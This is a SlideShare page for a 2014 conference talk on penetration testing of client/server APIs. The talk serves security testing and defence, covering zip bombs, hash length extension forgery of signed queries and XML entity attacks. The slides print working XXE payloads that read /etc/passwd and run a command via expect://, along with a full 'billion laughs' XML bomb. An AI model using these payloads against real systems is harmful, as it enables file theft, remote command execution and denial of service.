Submit Search
Upload
CodeFest 2014 - Pentesting client/server API
•
0 likes
•
36,242 views
Sergey Belov
Follow
http://2014.codefest.ru/lecture/696
Read less
Read more
Technology
News & Politics
Report
Share
Report
Share
1 of 58
Download now
Download to read offline
Recommended
CodeFest 2014. Белов С. — BlackBox тестирование безопасности клиент-серверног...
CodeFest 2014. Белов С. — BlackBox тестирование безопасности клиент-серверног...
CodeFest
ATT&CKING Containers in The Cloud
ATT&CKING Containers in The Cloud
MITRE ATT&CK
Cryptography
Cryptography
Sri Manakula Vinayagar Engineering College
Conclusions from Tracking Server Attacks at Scale
Conclusions from Tracking Server Attacks at Scale
Guardicore
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
SecuRing
[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera Software
OWASP
B.Noviansyah - National Public Key Infrastructure: Friend or Foe?
B.Noviansyah - National Public Key Infrastructure: Friend or Foe?
idsecconf
AISA 2018 Perth Conference: State Of Web Wecurity In 2018
AISA 2018 Perth Conference: State Of Web Wecurity In 2018
James Bromberger
Recommended
CodeFest 2014. Белов С. — BlackBox тестирование безопасности клиент-серверног...
CodeFest 2014. Белов С. — BlackBox тестирование безопасности клиент-серверног...
CodeFest
ATT&CKING Containers in The Cloud
ATT&CKING Containers in The Cloud
MITRE ATT&CK
Cryptography
Cryptography
Sri Manakula Vinayagar Engineering College
Conclusions from Tracking Server Attacks at Scale
Conclusions from Tracking Server Attacks at Scale
Guardicore
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
SecuRing
[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera Software
OWASP
B.Noviansyah - National Public Key Infrastructure: Friend or Foe?
B.Noviansyah - National Public Key Infrastructure: Friend or Foe?
idsecconf
AISA 2018 Perth Conference: State Of Web Wecurity In 2018
AISA 2018 Perth Conference: State Of Web Wecurity In 2018
James Bromberger
Common crypto attacks and secure implementations
Common crypto attacks and secure implementations
Trupti Shiralkar, CISSP
Securing TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography API
Kevin Hakanson
MITRE ATT&CKcon 2.0: Tracking and Measuring ATT&CK Coverage with ATTACK2Jira ...
MITRE ATT&CKcon 2.0: Tracking and Measuring ATT&CK Coverage with ATTACK2Jira ...
MITRE - ATT&CKcon
The Boring Security Talk - Azure Global Bootcamp Melbourne 2019
The Boring Security Talk - Azure Global Bootcamp Melbourne 2019
kieranjacobsen
Building & Hacking Modern iOS Apps
Building & Hacking Modern iOS Apps
SecuRing
CSW2017 Minrui yan+Jianhao-liu a visualization tool for evaluating can-bus cy...
CSW2017 Minrui yan+Jianhao-liu a visualization tool for evaluating can-bus cy...
CanSecWest
MITRE ATTACKCon Power Hour - December
MITRE ATTACKCon Power Hour - December
MITRE - ATT&CKcon
Zerotrusting serverless applications protecting microservices using secure d...
Zerotrusting serverless applications protecting microservices using secure d...
Trupti Shiralkar, CISSP
Fade from Whitehat... to Black
Fade from Whitehat... to Black
Beau Bullock
Are your cloud servers under attack?– Hacker Halted 2019 – Brian Hileman
Are your cloud servers under attack?– Hacker Halted 2019 – Brian Hileman
EC-Council
Practical Cryptography and Security Concepts for Developers
Practical Cryptography and Security Concepts for Developers
Gökhan Şengün
Speed and security for your PHP application
Speed and security for your PHP application
Zend by Rogue Wave Software
DEVNET-1190 Targeted Threat (APT) Defense for Hosted Applications
DEVNET-1190 Targeted Threat (APT) Defense for Hosted Applications
Cisco DevNet
Csw2016 chaykin having_funwithsecuremessengers_and_androidwear
Csw2016 chaykin having_funwithsecuremessengers_and_androidwear
CanSecWest
Develop microservices in php
Develop microservices in php
Zend by Rogue Wave Software
Standardizing and Strengthening Security to Lower Costs
Standardizing and Strengthening Security to Lower Costs
OpenDNS
Network security-primer-9544
Network security-primer-9544
Hfz Mushtaq
2015 Security Report
2015 Security Report
Check Point Software Technologies
Java script and web cryptography (cf.objective)
Java script and web cryptography (cf.objective)
ColdFusionConference
MITRE ATT&CKcon 2018: Sofacy 2018 and the Adversary Playbook, Robert Falcone,...
MITRE ATT&CKcon 2018: Sofacy 2018 and the Adversary Playbook, Robert Falcone,...
MITRE - ATT&CKcon
очир абушинов
очир абушинов
Alexei Lupan
Опыт организации тестирования безопасности Web приложений в компании
Опыт организации тестирования безопасности Web приложений в компании
SQALab
More Related Content
What's hot
Common crypto attacks and secure implementations
Common crypto attacks and secure implementations
Trupti Shiralkar, CISSP
Securing TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography API
Kevin Hakanson
MITRE ATT&CKcon 2.0: Tracking and Measuring ATT&CK Coverage with ATTACK2Jira ...
MITRE ATT&CKcon 2.0: Tracking and Measuring ATT&CK Coverage with ATTACK2Jira ...
MITRE - ATT&CKcon
The Boring Security Talk - Azure Global Bootcamp Melbourne 2019
The Boring Security Talk - Azure Global Bootcamp Melbourne 2019
kieranjacobsen
Building & Hacking Modern iOS Apps
Building & Hacking Modern iOS Apps
SecuRing
CSW2017 Minrui yan+Jianhao-liu a visualization tool for evaluating can-bus cy...
CSW2017 Minrui yan+Jianhao-liu a visualization tool for evaluating can-bus cy...
CanSecWest
MITRE ATTACKCon Power Hour - December
MITRE ATTACKCon Power Hour - December
MITRE - ATT&CKcon
Zerotrusting serverless applications protecting microservices using secure d...
Zerotrusting serverless applications protecting microservices using secure d...
Trupti Shiralkar, CISSP
Fade from Whitehat... to Black
Fade from Whitehat... to Black
Beau Bullock
Are your cloud servers under attack?– Hacker Halted 2019 – Brian Hileman
Are your cloud servers under attack?– Hacker Halted 2019 – Brian Hileman
EC-Council
Practical Cryptography and Security Concepts for Developers
Practical Cryptography and Security Concepts for Developers
Gökhan Şengün
Speed and security for your PHP application
Speed and security for your PHP application
Zend by Rogue Wave Software
DEVNET-1190 Targeted Threat (APT) Defense for Hosted Applications
DEVNET-1190 Targeted Threat (APT) Defense for Hosted Applications
Cisco DevNet
Csw2016 chaykin having_funwithsecuremessengers_and_androidwear
Csw2016 chaykin having_funwithsecuremessengers_and_androidwear
CanSecWest
Develop microservices in php
Develop microservices in php
Zend by Rogue Wave Software
Standardizing and Strengthening Security to Lower Costs
Standardizing and Strengthening Security to Lower Costs
OpenDNS
Network security-primer-9544
Network security-primer-9544
Hfz Mushtaq
2015 Security Report
2015 Security Report
Check Point Software Technologies
Java script and web cryptography (cf.objective)
Java script and web cryptography (cf.objective)
ColdFusionConference
MITRE ATT&CKcon 2018: Sofacy 2018 and the Adversary Playbook, Robert Falcone,...
MITRE ATT&CKcon 2018: Sofacy 2018 and the Adversary Playbook, Robert Falcone,...
MITRE - ATT&CKcon
What's hot
(20)
Common crypto attacks and secure implementations
Common crypto attacks and secure implementations
Securing TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography API
MITRE ATT&CKcon 2.0: Tracking and Measuring ATT&CK Coverage with ATTACK2Jira ...
MITRE ATT&CKcon 2.0: Tracking and Measuring ATT&CK Coverage with ATTACK2Jira ...
The Boring Security Talk - Azure Global Bootcamp Melbourne 2019
The Boring Security Talk - Azure Global Bootcamp Melbourne 2019
Building & Hacking Modern iOS Apps
Building & Hacking Modern iOS Apps
CSW2017 Minrui yan+Jianhao-liu a visualization tool for evaluating can-bus cy...
CSW2017 Minrui yan+Jianhao-liu a visualization tool for evaluating can-bus cy...
MITRE ATTACKCon Power Hour - December
MITRE ATTACKCon Power Hour - December
Zerotrusting serverless applications protecting microservices using secure d...
Zerotrusting serverless applications protecting microservices using secure d...
Fade from Whitehat... to Black
Fade from Whitehat... to Black
Are your cloud servers under attack?– Hacker Halted 2019 – Brian Hileman
Are your cloud servers under attack?– Hacker Halted 2019 – Brian Hileman
Practical Cryptography and Security Concepts for Developers
Practical Cryptography and Security Concepts for Developers
Speed and security for your PHP application
Speed and security for your PHP application
DEVNET-1190 Targeted Threat (APT) Defense for Hosted Applications
DEVNET-1190 Targeted Threat (APT) Defense for Hosted Applications
Csw2016 chaykin having_funwithsecuremessengers_and_androidwear
Csw2016 chaykin having_funwithsecuremessengers_and_androidwear
Develop microservices in php
Develop microservices in php
Standardizing and Strengthening Security to Lower Costs
Standardizing and Strengthening Security to Lower Costs
Network security-primer-9544
Network security-primer-9544
2015 Security Report
2015 Security Report
Java script and web cryptography (cf.objective)
Java script and web cryptography (cf.objective)
MITRE ATT&CKcon 2018: Sofacy 2018 and the Adversary Playbook, Robert Falcone,...
MITRE ATT&CKcon 2018: Sofacy 2018 and the Adversary Playbook, Robert Falcone,...
Viewers also liked
очир абушинов
очир абушинов
Alexei Lupan
Опыт организации тестирования безопасности Web приложений в компании
Опыт организации тестирования безопасности Web приложений в компании
SQALab
CodeFest 2012 - Пентест на стероидах
CodeFest 2012 - Пентест на стероидах
Sergey Belov
Тестирование защищенности веб-приложений
Тестирование защищенности веб-приложений
SQALab
Nginx warhead
Nginx warhead
Sergey Belov
Attacking thru HTTP Host header
Attacking thru HTTP Host header
Sergey Belov
(Не)безопасный frontend
(Не)безопасный frontend
Sergey Belov
ZeroNights - SmartTV
ZeroNights - SmartTV
Sergey Belov
современная практика статического анализа безопасности кода веб приложений
современная практика статического анализа безопасности кода веб приложений
Sergey Belov
Сергей Полаженко - Security Testing: SQL Injection
Сергей Полаженко - Security Testing: SQL Injection
SQALab
Автоматизация тестирования веб-сервисов посредством SOAP UI
Автоматизация тестирования веб-сервисов посредством SOAP UI
automated-testing.info
Тестирование безопасности: PHP инъекция
Тестирование безопасности: PHP инъекция
SQALab
Практика тестирования web сервисов
Практика тестирования web сервисов
SQALab
Онлайн безопасность - фактор #1 в SEO
Онлайн безопасность - фактор #1 в SEO
Yuriy Titkov
якимович нагрузочное тестирование клиент серверных приложений
якимович нагрузочное тестирование клиент серверных приложений
sef2009
Нагрузочное тестирование клиент-серверных приложений
Нагрузочное тестирование клиент-серверных приложений
SQALab
Ui testing how intel does this
Ui testing how intel does this
Alexei Lupan
Кейс: Как два сеошника за год сделали +$2М к обороту компаний.
Кейс: Как два сеошника за год сделали +$2М к обороту компаний.
Andrey Kapeltsov
Contacto server API in PHP
Contacto server API in PHP
Hem Shrestha
API
API
guest7e8175a
Viewers also liked
(20)
очир абушинов
очир абушинов
Опыт организации тестирования безопасности Web приложений в компании
Опыт организации тестирования безопасности Web приложений в компании
CodeFest 2012 - Пентест на стероидах
CodeFest 2012 - Пентест на стероидах
Тестирование защищенности веб-приложений
Тестирование защищенности веб-приложений
Nginx warhead
Nginx warhead
Attacking thru HTTP Host header
Attacking thru HTTP Host header
(Не)безопасный frontend
(Не)безопасный frontend
ZeroNights - SmartTV
ZeroNights - SmartTV
современная практика статического анализа безопасности кода веб приложений
современная практика статического анализа безопасности кода веб приложений
Сергей Полаженко - Security Testing: SQL Injection
Сергей Полаженко - Security Testing: SQL Injection
Автоматизация тестирования веб-сервисов посредством SOAP UI
Автоматизация тестирования веб-сервисов посредством SOAP UI
Тестирование безопасности: PHP инъекция
Тестирование безопасности: PHP инъекция
Практика тестирования web сервисов
Практика тестирования web сервисов
Онлайн безопасность - фактор #1 в SEO
Онлайн безопасность - фактор #1 в SEO
якимович нагрузочное тестирование клиент серверных приложений
якимович нагрузочное тестирование клиент серверных приложений
Нагрузочное тестирование клиент-серверных приложений
Нагрузочное тестирование клиент-серверных приложений
Ui testing how intel does this
Ui testing how intel does this
Кейс: Как два сеошника за год сделали +$2М к обороту компаний.
Кейс: Как два сеошника за год сделали +$2М к обороту компаний.
Contacto server API in PHP
Contacto server API in PHP
API
API
Similar to CodeFest 2014 - Pentesting client/server API
Microservices Manchester: Security, Microservces and Vault by Nicki Watt
Microservices Manchester: Security, Microservces and Vault by Nicki Watt
OpenCredo
End to End Security - Check Point
End to End Security - Check Point
Harry Gunns
FIDO Masterclass
FIDO Masterclass
FIDO Alliance
TDC2018SP | Trilha Mobile - Case VC+: Como tornar seguro um aplicativo mobile...
TDC2018SP | Trilha Mobile - Case VC+: Como tornar seguro um aplicativo mobile...
tdc-globalcode
Case VC+: Como tornar seguro um aplicativo mobile payment sem penalizar a exp...
Case VC+: Como tornar seguro um aplicativo mobile payment sem penalizar a exp...
Márcio Rosa
[WSO2Con USA 2018] Design and Implementation of the Veridium Authenticator: A...
[WSO2Con USA 2018] Design and Implementation of the Veridium Authenticator: A...
WSO2
Expanding APIs beyond the Web
Expanding APIs beyond the Web
Tim Messerschmidt
Check point presentation june 2014
Check point presentation june 2014
David Berkelmans
Steam Learn: HTTPS and certificates explained
Steam Learn: HTTPS and certificates explained
inovia
Cisco APIs: An Interactive Assistant for the Web2Day Developer Conference
Cisco APIs: An Interactive Assistant for the Web2Day Developer Conference
Cisco DevNet
2018 06 Presentation Cloudguard IaaS de Checkpoint
2018 06 Presentation Cloudguard IaaS de Checkpoint
e-Xpert Solutions SA
How to Implement Organization Wide Cyber Hygiene?
How to Implement Organization Wide Cyber Hygiene?
SecPod
Meeting rooms are talking! are you listening?
Meeting rooms are talking! are you listening?
Cisco DevNet
Better watch your apps - MJ Keith
Better watch your apps - MJ Keith
m j
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
Codemotion
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
Codemotion
Integrating WordPress With Web APIs
Integrating WordPress With Web APIs
randyhoyt
Network software gotovaya
Network software gotovaya
Vlad Demensky
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
CODE BLUE
2018 06 Presentation Cloudguard SaaS de Checkpoint
2018 06 Presentation Cloudguard SaaS de Checkpoint
e-Xpert Solutions SA
Similar to CodeFest 2014 - Pentesting client/server API
(20)
Microservices Manchester: Security, Microservces and Vault by Nicki Watt
Microservices Manchester: Security, Microservces and Vault by Nicki Watt
End to End Security - Check Point
End to End Security - Check Point
FIDO Masterclass
FIDO Masterclass
TDC2018SP | Trilha Mobile - Case VC+: Como tornar seguro um aplicativo mobile...
TDC2018SP | Trilha Mobile - Case VC+: Como tornar seguro um aplicativo mobile...
Case VC+: Como tornar seguro um aplicativo mobile payment sem penalizar a exp...
Case VC+: Como tornar seguro um aplicativo mobile payment sem penalizar a exp...
[WSO2Con USA 2018] Design and Implementation of the Veridium Authenticator: A...
[WSO2Con USA 2018] Design and Implementation of the Veridium Authenticator: A...
Expanding APIs beyond the Web
Expanding APIs beyond the Web
Check point presentation june 2014
Check point presentation june 2014
Steam Learn: HTTPS and certificates explained
Steam Learn: HTTPS and certificates explained
Cisco APIs: An Interactive Assistant for the Web2Day Developer Conference
Cisco APIs: An Interactive Assistant for the Web2Day Developer Conference
2018 06 Presentation Cloudguard IaaS de Checkpoint
2018 06 Presentation Cloudguard IaaS de Checkpoint
How to Implement Organization Wide Cyber Hygiene?
How to Implement Organization Wide Cyber Hygiene?
Meeting rooms are talking! are you listening?
Meeting rooms are talking! are you listening?
Better watch your apps - MJ Keith
Better watch your apps - MJ Keith
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
Integrating WordPress With Web APIs
Integrating WordPress With Web APIs
Network software gotovaya
Network software gotovaya
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
2018 06 Presentation Cloudguard SaaS de Checkpoint
2018 06 Presentation Cloudguard SaaS de Checkpoint
Recently uploaded
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
NavinnSomaal
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
BookNet Canada
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
2toLead Limited
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
Pixlogix Infotech
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
Fwdays
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
LoriGlavin3
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
Alfredo García Lavilla
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
ScyllaDB
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
Alan Dix
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
Mattias Andersson
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
DianaGray10
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
Slibray Presentation
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
Alex Barbosa Coqueiro
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
BookNet Canada
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
UiPathCommunity
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
LoriGlavin3
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
Commit University
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
Lonnie McRorey
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
Raghuram Pandurangan
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Mark Simos
Recently uploaded
(20)
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
CodeFest 2014 - Pentesting client/server API
1.
Pentesting client/server API Sergey
Belov
2.
$ whoami © 2002—2014,
Digital Security 2 • Senior Security Auditor at Digital Security • BugHunter: Google, Yandex, Badoo, Yahoo +++ • Writer: habrahabr, Xakep magazine • CTF: DEFCON 2012 CTF Final, Chaos Construction CTF’2013 • Speaker: CodeFest 2012, ZeroNights 0x03 • Trainer: Hack in Paris’2014, BlackHat’2014 USA (soon)
3.
What are we
talking about? © 2002—2014, Digital Security 3 API
4.
What are we
talking about? © 2002—2014, Digital Security 4 API
5.
Hacking via API ©
2002—2014, Digital Security 5
6.
Hacking via API ©
2002—2014, Digital Security 6
7.
Hacking via API ©
2002—2014, Digital Security 7 From interface to API methods
8.
Hacking via API ©
2002—2014, Digital Security 8
9.
Hacking via API ©
2002—2014, Digital Security 9
10.
Hacking via API ©
2002—2014, Digital Security 10
11.
Hacking via API ©
2002—2014, Digital Security 11
12.
Hacking via API ©
2002—2014, Digital Security 12 What should we test? • Logic! • Bypassing restrictions (sqli/xss) • Parameter tampering Developing • Stop hacks and custom implementation in API! Really
13.
Hacking via API ©
2002—2014, Digital Security 13
14.
Hacking via API ©
2002—2014, Digital Security 14 ZIP
15.
Hacking via API ©
2002—2014, Digital Security 15 42 Kb…
16.
Hacking via API ©
2002—2014, Digital Security 16 42 Kb… …10 Gb?
17.
Hacking via API ©
2002—2014, Digital Security 17 42 Kb… …10 Gb? …100 Gb?
18.
Hacking via API ©
2002—2014, Digital Security 18 42 Kb… …10 Gb? …100 Gb? …100 Tb?
19.
Hacking via API ©
2002—2014, Digital Security 19 42 Kb… …10 Gb? …100 Gb? …100 Tb? …4.5 Pb! http://www.unforgettable.dk/
20.
Hacking via API ©
2002—2014, Digital Security 20 Say HELLO to ZIP BOMB!
21.
Hacking via API ©
2002—2014, Digital Security 21 The evil of JavaScript and
22.
Hacking via API ©
2002—2014, Digital Security 22
23.
Hacking via API ©
2002—2014, Digital Security 23
24.
Hacking via API ©
2002—2014, Digital Security 24 http://habrahabr.ru/post/186160/
25.
Hacking via API ©
2002—2014, Digital Security 25 Crypto
26.
Hacking via API ©
2002—2014, Digital Security 26 Query signing Sign = sha*(…+DATA+…) APIkey
27.
Hacking via API ©
2002—2014, Digital Security 27
28.
Hacking via API ©
2002—2014, Digital Security 28 But why?
29.
Hacking via API ©
2002—2014, Digital Security 29 Say hello again. To length extension attack
30.
Hacking via API ©
2002—2014, Digital Security 30 A=1&B=2&C=3 07ce36c769ae130708258fb5dfa3d37ca5a67514 TOKEN=sha1(KEY+DATA)
31.
Hacking via API ©
2002—2014, Digital Security 31 Some have hijacked just 1 request…
32.
Hacking via API ©
2002—2014, Digital Security 32 What does the attacker know? • Original data • Sign (token)
33.
Hacking via API ©
2002—2014, Digital Security 33 What does the attacker want? Change some data / change params
34.
Hacking via API ©
2002—2014, Digital Security 34 A=1&B=2&C=3x80x00x00…x02&C=4
35.
Hacking via API ©
2002—2014, Digital Security 35 Can sign new query without API key! Vkontakte: sig = md5(name1=value1name2=value2api_secret) Mail.RU sig = md5(uid + params + private_key) http://www.vnsecurity.net/2010/03/codegate_challenge15_sha1_padding_attack
36.
Hacking via API ©
2002—2014, Digital Security 36 Request hijacking… How?
37.
Hacking via API ©
2002—2014, Digital Security 37
38.
Hacking via API ©
2002—2014, Digital Security 38
39.
Hacking via API ©
2002—2014, Digital Security 39
40.
Hacking via API ©
2002—2014, Digital Security 40
41.
Hacking via API ©
2002—2014, Digital Security 41
42.
Hacking via API ©
2002—2014, Digital Security 42
43.
Hacking via API ©
2002—2014, Digital Security 43
44.
Hacking via API ©
2002—2014, Digital Security 44
45.
Hacking via API ©
2002—2014, Digital Security 45 XML? XML entities!
46.
Hacking via API ©
2002—2014, Digital Security 46 DTD Example: <!ENTITY writer "Donald Duck."> <!ENTITY copyright "Copyright W3Schools."> XML example: <author>&writer;©right;</author>
47.
Hacking via API ©
2002—2014, Digital Security 47 XML entities? External Entity!
48.
Hacking via API ©
2002—2014, Digital Security 48 <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo>
49.
Hacking via API ©
2002—2014, Digital Security 49 <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM “expect://id" >]> <foo>&xxe;</foo>
50.
Hacking via API ©
2002—2014, Digital Security 50 XML Bombs!
51.
Hacking via API ©
2002—2014, Digital Security 51 <?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz>
52.
What are we
talking about? © 2002—2014, Digital Security 52 Man in the Middle
53.
Hacking via API ©
2002—2014, Digital Security 53 Examples?
54.
Hacking via API ©
2002—2014, Digital Security 54 2013-11-19 by Reginaldo Silva
55.
Hacking via API ©
2002—2014, Digital Security 55 https://www.facebook.com/BugBounty/posts/778897822124446 http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution
56.
Hacking via API ©
2002—2014, Digital Security 56 Testing: • https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008) • XXE to RCE https://gist.github.com/joernchen/3623896 Development: • Disable entities
57.
Hacking via API ©
2002—2014, Digital Security 57 Finally: • Re-test all interface restrictions; • Specific compressions; • JS callbacks; • Crypto + SSL test + hardcoded credentials (hackapp.com); • XML - XXE; • Anything else :]
58.
twitter.com/sergeybelove sbelov@dsec.ru Digital Security в
Москве: (495) 223-07-86 Digital Security в Санкт-Петербурге: (812) 703-15-47 Hacking via API Thanks for your attention! Questions? © 2002—2014, Digital Security 58
Download now